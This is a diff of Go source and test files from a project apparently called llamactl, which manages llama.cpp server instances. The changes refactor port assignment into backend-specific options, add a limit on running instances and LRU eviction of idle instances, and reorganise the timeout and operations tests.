t.Fatalf("CreateInstance failed: %v", err)
}
port1 := inst1.GetOptions().Port
if port1 < 8000 || port1 > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port1)
}
// Test port conflict detection
options2 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: port1, // Same port - should conflict
},
}
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test port release on deletion
specificPort := 8080
options3 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: specificPort,
},
}
_, err = manager.CreateInstance("port-test", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
err = manager.DeleteInstance("port-test")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-port-test", options3)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestInstanceOperations(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instance
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Get instance
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
// Update instance
newOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
}
// List instances
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Errorf("Expected 1 instance, got %d", len(instances))
}
// Delete instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
// Test operations on non-existent instances
_, err = manager.GetInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
err = manager.DeleteInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
_, err = manager.UpdateInstance("nonexistent", options)
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestPersistence(t *testing.T) { func TestPersistence(t *testing.T) {
tempDir := t.TempDir() tempDir := t.TempDir()
@@ -265,7 +54,8 @@ func TestPersistence(t *testing.T) {
// Test instance persistence on creation // Test instance persistence on creation
manager1 := manager.NewInstanceManager(cfg) manager1 := manager.NewInstanceManager(cfg)
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
Port: 8080, Port: 8080,
}, },
@@ -312,119 +102,27 @@ func TestPersistence(t *testing.T) {
} }
} }
func TestTimeoutFunctionality(t *testing.T) {
// Test timeout checker initialization
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
TimeoutCheckInterval: 10,
MaxInstances: 5,
}
manager := manager.NewInstanceManager(cfg)
if manager == nil {
t.Fatal("Manager should be initialized with timeout checker")
}
manager.Shutdown() // Clean up
// Test timeout configuration and logic without starting the actual process
testManager := createTestManager()
defer testManager.Shutdown()
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst, err := testManager.CreateInstance("timeout-test", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Test timeout configuration is properly set
if inst.GetOptions().IdleTimeout == nil {
t.Fatal("Instance should have idle timeout configured")
}
if *inst.GetOptions().IdleTimeout != 1 {
t.Errorf("Expected idle timeout 1 minute, got %d", *inst.GetOptions().IdleTimeout)
}
// Test timeout logic without actually starting the process
// Create a mock time provider to simulate timeout
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set instance to running state so timeout logic can work
inst.Running = true
// Simulate instance being "running" for timeout check (without actual process)
// We'll test the ShouldTimeout logic directly
inst.UpdateLastRequestTime()
// Initially should not timeout (just updated)
if inst.ShouldTimeout() {
t.Error("Instance should not timeout immediately after request")
}
// Advance time to trigger timeout
mockTime.SetTime(time.Now().Add(2 * time.Minute))
// Now it should timeout
if !inst.ShouldTimeout() {
t.Error("Instance should timeout after idle period")
}
// Reset running state to avoid shutdown issues
inst.Running = false
// Test that instance without timeout doesn't timeout
noTimeoutOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
// No IdleTimeout set
}
noTimeoutInst, err := testManager.CreateInstance("no-timeout-test", noTimeoutOptions)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
noTimeoutInst.SetTimeProvider(mockTime)
noTimeoutInst.Running = true // Set to running for timeout check
noTimeoutInst.UpdateLastRequestTime()
// Even with time advanced, should not timeout
if noTimeoutInst.ShouldTimeout() {
t.Error("Instance without timeout configuration should never timeout")
}
// Reset running state to avoid shutdown issues
noTimeoutInst.Running = false
}
func TestConcurrentAccess(t *testing.T) { func TestConcurrentAccess(t *testing.T) {
manager := createTestManager() mgr := createTestManager()
defer manager.Shutdown() defer mgr.Shutdown()
// Test concurrent operations // Test concurrent operations
var wg sync.WaitGroup var wg sync.WaitGroup
errChan := make(chan error, 10) errChan := make(chan error, 10)
// Concurrent instance creation // Concurrent instance creation
for i := 0; i < 5; i++ { for i := range 5 {
wg.Add(1) wg.Add(1)
go func(index int) { go func(index int) {
defer wg.Done() defer wg.Done()
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
instanceName := fmt.Sprintf("concurrent-test-%d", index) instanceName := fmt.Sprintf("concurrent-test-%d", index)
if _, err := manager.CreateInstance(instanceName, options); err != nil { if _, err := mgr.CreateInstance(instanceName, options); err != nil {
errChan <- err errChan <- err
} }
}(i) }(i)
@@ -435,7 +133,7 @@ func TestConcurrentAccess(t *testing.T) {
wg.Add(1) wg.Add(1)
go func() { go func() {
defer wg.Done() defer wg.Done()
if _, err := manager.ListInstances(); err != nil { if _, err := mgr.ListInstances(); err != nil {
errChan <- err errChan <- err
} }
}() }()
@@ -451,24 +149,25 @@ func TestConcurrentAccess(t *testing.T) {
} }
func TestShutdown(t *testing.T) { func TestShutdown(t *testing.T) {
manager := createTestManager() mgr := createTestManager()
// Create test instance // Create test instance
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
_, err := manager.CreateInstance("test-instance", options) _, err := mgr.CreateInstance("test-instance", options)
if err != nil { if err != nil {
t.Fatalf("CreateInstance failed: %v", err) t.Fatalf("CreateInstance failed: %v", err)
} }
// Shutdown should not panic // Shutdown should not panic
manager.Shutdown() mgr.Shutdown()
// Multiple shutdowns should not panic // Multiple shutdowns should not panic
manager.Shutdown() mgr.Shutdown()
} }
// Helper function to create a test manager with standard config // Helper function to create a test manager with standard config
@@ -485,25 +184,3 @@ func createTestManager() manager.InstanceManager {
} }
return manager.NewInstanceManager(cfg) return manager.NewInstanceManager(cfg)
} }
// Helper for timeout tests
type MockTimeProvider struct {
currentTime time.Time
mu sync.RWMutex
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
return &MockTimeProvider{currentTime: t}
}
func (m *MockTimeProvider) Now() time.Time {
m.mu.RLock()
defer m.mu.RUnlock()
return m.currentTime
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.mu.Lock()
defer m.mu.Unlock()
m.currentTime = t
}

View File

@@ -2,12 +2,15 @@ package manager
import ( import (
"fmt" "fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance" "llamactl/pkg/instance"
"llamactl/pkg/validation" "llamactl/pkg/validation"
"os" "os"
"path/filepath" "path/filepath"
) )
type MaxRunningInstancesError error
// ListInstances returns a list of all instances managed by the instance manager. // ListInstances returns a list of all instances managed by the instance manager.
func (im *instanceManager) ListInstances() ([]*instance.Process, error) { func (im *instanceManager) ListInstances() ([]*instance.Process, error) {
im.mu.RLock() im.mu.RLock()
@@ -50,24 +53,17 @@ func (im *instanceManager) CreateInstance(name string, options *instance.CreateI
return nil, fmt.Errorf("instance with name %s already exists", name) return nil, fmt.Errorf("instance with name %s already exists", name)
} }
// Assign a port if not specified // Assign and validate port for backend-specific options
if options.Port == 0 { if err := im.assignAndValidatePort(options); err != nil {
port, err := im.getNextAvailablePort() return nil, err
if err != nil {
return nil, fmt.Errorf("failed to get next available port: %w", err)
}
options.Port = port
} else {
// Validate the specified port
if _, exists := im.ports[options.Port]; exists {
return nil, fmt.Errorf("port %d is already in use", options.Port)
}
im.ports[options.Port] = true
} }
inst := instance.NewInstance(name, &im.instancesConfig, options) statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
im.onStatusChange(name, oldStatus, newStatus)
}
inst := instance.NewInstance(name, &im.instancesConfig, options, statusCallback)
im.instances[inst.Name] = inst im.instances[inst.Name] = inst
im.ports[options.Port] = true
if err := im.persistInstance(inst); err != nil { if err := im.persistInstance(inst); err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err) return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
@@ -109,7 +105,7 @@ func (im *instanceManager) UpdateInstance(name string, options *instance.CreateI
} }
// Check if instance is running before updating options // Check if instance is running before updating options
wasRunning := instance.Running wasRunning := instance.IsRunning()
// If the instance is running, stop it first // If the instance is running, stop it first
if wasRunning { if wasRunning {
@@ -147,11 +143,11 @@ func (im *instanceManager) DeleteInstance(name string) error {
return fmt.Errorf("instance with name %s not found", name) return fmt.Errorf("instance with name %s not found", name)
} }
if instance.Running { if instance.IsRunning() {
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name) return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
} }
delete(im.ports, instance.GetOptions().Port) delete(im.ports, instance.GetPort())
delete(im.instances, name) delete(im.instances, name)
// Delete the instance's config file if persistence is enabled // Delete the instance's config file if persistence is enabled
@@ -168,15 +164,20 @@ func (im *instanceManager) DeleteInstance(name string) error {
func (im *instanceManager) StartInstance(name string) (*instance.Process, error) { func (im *instanceManager) StartInstance(name string) (*instance.Process, error) {
im.mu.RLock() im.mu.RLock()
instance, exists := im.instances[name] instance, exists := im.instances[name]
maxRunningExceeded := len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances && im.instancesConfig.MaxRunningInstances != -1
im.mu.RUnlock() im.mu.RUnlock()
if !exists { if !exists {
return nil, fmt.Errorf("instance with name %s not found", name) return nil, fmt.Errorf("instance with name %s not found", name)
} }
if instance.Running { if instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already running", name) return instance, fmt.Errorf("instance with name %s is already running", name)
} }
if maxRunningExceeded {
return nil, MaxRunningInstancesError(fmt.Errorf("maximum number of running instances (%d) reached", im.instancesConfig.MaxRunningInstances))
}
if err := instance.Start(); err != nil { if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s: %w", name, err) return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
} }
@@ -191,6 +192,17 @@ func (im *instanceManager) StartInstance(name string) (*instance.Process, error)
return instance, nil return instance, nil
} }
func (im *instanceManager) IsMaxRunningInstancesReached() bool {
im.mu.RLock()
defer im.mu.RUnlock()
if im.instancesConfig.MaxRunningInstances != -1 && len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances {
return true
}
return false
}
// StopInstance stops a running instance and returns it. // StopInstance stops a running instance and returns it.
func (im *instanceManager) StopInstance(name string) (*instance.Process, error) { func (im *instanceManager) StopInstance(name string) (*instance.Process, error) {
im.mu.RLock() im.mu.RLock()
@@ -200,7 +212,7 @@ func (im *instanceManager) StopInstance(name string) (*instance.Process, error)
if !exists { if !exists {
return nil, fmt.Errorf("instance with name %s not found", name) return nil, fmt.Errorf("instance with name %s not found", name)
} }
if !instance.Running { if !instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already stopped", name) return instance, fmt.Errorf("instance with name %s is already stopped", name)
} }
@@ -240,3 +252,49 @@ func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
// TODO: Implement actual log retrieval logic // TODO: Implement actual log retrieval logic
return fmt.Sprintf("Logs for instance %s", name), nil return fmt.Sprintf("Logs for instance %s", name), nil
} }
// getPortFromOptions extracts the port from backend-specific options
func (im *instanceManager) getPortFromOptions(options *instance.CreateInstanceOptions) int {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
return options.LlamaServerOptions.Port
}
}
return 0
}
// setPortInOptions sets the port in backend-specific options
func (im *instanceManager) setPortInOptions(options *instance.CreateInstanceOptions, port int) {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
options.LlamaServerOptions.Port = port
}
}
}
// assignAndValidatePort assigns a port if not specified and validates it's not in use
func (im *instanceManager) assignAndValidatePort(options *instance.CreateInstanceOptions) error {
currentPort := im.getPortFromOptions(options)
if currentPort == 0 {
// Assign a port if not specified
port, err := im.getNextAvailablePort()
if err != nil {
return fmt.Errorf("failed to get next available port: %w", err)
}
im.setPortInOptions(options, port)
// Mark the port as used
im.ports[port] = true
} else {
// Validate the specified port
if _, exists := im.ports[currentPort]; exists {
return fmt.Errorf("port %d is already in use", currentPort)
}
// Mark the port as used
im.ports[currentPort] = true
}
return nil
}

View File

@@ -0,0 +1,229 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"strings"
"testing"
)
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
}
if inst.GetStatus() != instance.Stopped {
t.Error("New instance should not be running")
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
}
func TestCreateInstance_ValidationAndLimits(t *testing.T) {
// Test duplicate names
mngr := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mngr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = mngr.CreateInstance("test-instance", options)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
// Test max instances limit
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 1, // Very low limit for testing
TimeoutCheckInterval: 5,
}
limitedManager := manager.NewInstanceManager(cfg)
_, err = limitedManager.CreateInstance("instance1", options)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// This should fail due to max instances limit
_, err = limitedManager.CreateInstance("instance2", options)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestPortManagement(t *testing.T) {
manager := createTestManager()
// Test auto port assignment
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
port1 := inst1.GetPort()
if port1 < 8000 || port1 > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port1)
}
// Test port conflict detection
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: port1, // Same port - should conflict
},
}
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test port release on deletion
specificPort := 8080
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: specificPort,
},
}
_, err = manager.CreateInstance("port-test", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
err = manager.DeleteInstance("port-test")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-port-test", options3)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestInstanceOperations(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instance
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Get instance
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
// Update instance
newOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().LlamaServerOptions.Model)
}
// List instances
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Errorf("Expected 1 instance, got %d", len(instances))
}
// Delete instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
// Test operations on non-existent instances
_, err = manager.GetInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
err = manager.DeleteInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
_, err = manager.UpdateInstance("nonexistent", options)
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}

View File

@@ -1,6 +1,10 @@
package manager package manager
import "log" import (
"fmt"
"llamactl/pkg/instance"
"log"
)
func (im *instanceManager) checkAllTimeouts() { func (im *instanceManager) checkAllTimeouts() {
im.mu.RLock() im.mu.RLock()
@@ -24,3 +28,37 @@ func (im *instanceManager) checkAllTimeouts() {
} }
} }
} }
// EvictLRUInstance finds and stops the least recently used running instance.
func (im *instanceManager) EvictLRUInstance() error {
im.mu.RLock()
var lruInstance *instance.Process
for name, _ := range im.runningInstances {
inst := im.instances[name]
if inst == nil {
continue
}
if inst.GetOptions() != nil && inst.GetOptions().IdleTimeout != nil && *inst.GetOptions().IdleTimeout <= 0 {
continue // Skip instances without idle timeout
}
if lruInstance == nil {
lruInstance = inst
}
if inst.LastRequestTime() < lruInstance.LastRequestTime() {
lruInstance = inst
}
}
im.mu.RUnlock()
if lruInstance == nil {
return fmt.Errorf("failed to find lru instance")
}
// Evict Instance
_, err := im.StopInstance(lruInstance.Name)
return err
}

328
pkg/manager/timeout_test.go Normal file
View File

@@ -0,0 +1,328 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"sync"
"testing"
"time"
)
func TestTimeoutFunctionality(t *testing.T) {
// Test timeout checker initialization
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
TimeoutCheckInterval: 10,
MaxInstances: 5,
}
manager := manager.NewInstanceManager(cfg)
if manager == nil {
t.Fatal("Manager should be initialized with timeout checker")
}
manager.Shutdown() // Clean up
// Test timeout configuration and logic without starting the actual process
testManager := createTestManager()
defer testManager.Shutdown()
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst, err := testManager.CreateInstance("timeout-test", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Test timeout configuration is properly set
if inst.GetOptions().IdleTimeout == nil {
t.Fatal("Instance should have idle timeout configured")
}
if *inst.GetOptions().IdleTimeout != 1 {
t.Errorf("Expected idle timeout 1 minute, got %d", *inst.GetOptions().IdleTimeout)
}
// Test timeout logic without actually starting the process
// Create a mock time provider to simulate timeout
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set instance to running state so timeout logic can work
inst.SetStatus(instance.Running)
// Simulate instance being "running" for timeout check (without actual process)
// We'll test the ShouldTimeout logic directly
inst.UpdateLastRequestTime()
// Initially should not timeout (just updated)
if inst.ShouldTimeout() {
t.Error("Instance should not timeout immediately after request")
}
// Advance time to trigger timeout
mockTime.SetTime(time.Now().Add(2 * time.Minute))
// Now it should timeout
if !inst.ShouldTimeout() {
t.Error("Instance should timeout after idle period")
}
// Reset running state to avoid shutdown issues
inst.SetStatus(instance.Stopped)
// Test that instance without timeout doesn't timeout
noTimeoutOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
// No IdleTimeout set
}
noTimeoutInst, err := testManager.CreateInstance("no-timeout-test", noTimeoutOptions)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
noTimeoutInst.SetTimeProvider(mockTime)
noTimeoutInst.SetStatus(instance.Running) // Set to running for timeout check
noTimeoutInst.UpdateLastRequestTime()
// Even with time advanced, should not timeout
if noTimeoutInst.ShouldTimeout() {
t.Error("Instance without timeout configuration should never timeout")
}
// Reset running state to avoid shutdown issues
noTimeoutInst.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_Success(t *testing.T) {
manager := createTestManager()
// Don't defer manager.Shutdown() - we'll handle cleanup manually
// Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic)
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model1.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model3.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
inst1, err := manager.CreateInstance("instance-1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst2, err := manager.CreateInstance("instance-2", options2)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst3, err := manager.CreateInstance("instance-3", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Set up mock time and set instances to running
mockTime := NewMockTimeProvider(time.Now())
inst1.SetTimeProvider(mockTime)
inst2.SetTimeProvider(mockTime)
inst3.SetTimeProvider(mockTime)
inst1.SetStatus(instance.Running)
inst2.SetStatus(instance.Running)
inst3.SetStatus(instance.Running)
// Set different last request times (oldest to newest)
// inst1: oldest (will be evicted)
inst1.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst2.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst3.UpdateLastRequestTime()
// Evict LRU instance (should be inst1)
err = manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify inst1 is stopped
if inst1.IsRunning() {
t.Error("Expected instance-1 to be stopped after eviction")
}
// Verify inst2 and inst3 are still running
if !inst2.IsRunning() {
t.Error("Expected instance-2 to still be running")
}
if !inst3.IsRunning() {
t.Error("Expected instance-3 to still be running")
}
// Clean up manually - set all to stopped and then shutdown
inst2.SetStatus(instance.Stopped)
inst3.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_NoEligibleInstances(t *testing.T) {
// Helper function to create instances with different timeout configurations
createInstanceWithTimeout := func(manager manager.InstanceManager, name, model string, timeout *int) *instance.Process {
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: model,
},
IdleTimeout: timeout,
}
inst, err := manager.CreateInstance(name, options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
return inst
}
t.Run("no running instances", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no running instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
})
t.Run("only instances without timeout", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create instances with various non-eligible timeout configurations
zeroTimeout := 0
negativeTimeout := -1
inst1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model1.gguf", &zeroTimeout)
inst2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model2.gguf", &negativeTimeout)
inst3 := createInstanceWithTimeout(manager, "no-timeout-3", "/path/to/model3.gguf", nil)
// Set instances to running
instances := []*instance.Process{inst1, inst2, inst3}
for _, inst := range instances {
inst.SetStatus(instance.Running)
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
inst.SetStatus(instance.Stopped)
}
}()
// Try to evict - should fail because no eligible instances
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no eligible instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
// Verify all instances are still running
for i, inst := range instances {
if !inst.IsRunning() {
t.Errorf("Expected instance %d to still be running", i+1)
}
}
})
t.Run("mixed instances - evicts only eligible ones", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create mix of instances: some with timeout enabled, some disabled
validTimeout := 1
zeroTimeout := 0
instWithTimeout := createInstanceWithTimeout(manager, "with-timeout", "/path/to/model-with-timeout.gguf", &validTimeout)
instNoTimeout1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model-no-timeout1.gguf", &zeroTimeout)
instNoTimeout2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model-no-timeout2.gguf", nil)
// Set all instances to running
instances := []*instance.Process{instWithTimeout, instNoTimeout1, instNoTimeout2}
for _, inst := range instances {
inst.SetStatus(instance.Running)
inst.UpdateLastRequestTime()
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
if inst.IsRunning() {
inst.SetStatus(instance.Stopped)
}
}
}()
// Evict LRU instance - should only consider the one with timeout
err := manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify only the instance with timeout was evicted
if instWithTimeout.IsRunning() {
t.Error("Expected with-timeout instance to be stopped after eviction")
}
if !instNoTimeout1.IsRunning() {
t.Error("Expected no-timeout-1 instance to still be running")
}
if !instNoTimeout2.IsRunning() {
t.Error("Expected no-timeout-2 instance to still be running")
}
})
}
// Helper for timeout tests
type MockTimeProvider struct {
currentTime time.Time
mu sync.RWMutex
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
return &MockTimeProvider{currentTime: t}
}
func (m *MockTimeProvider) Now() time.Time {
m.mu.RLock()
defer m.mu.RUnlock()
return m.currentTime
}
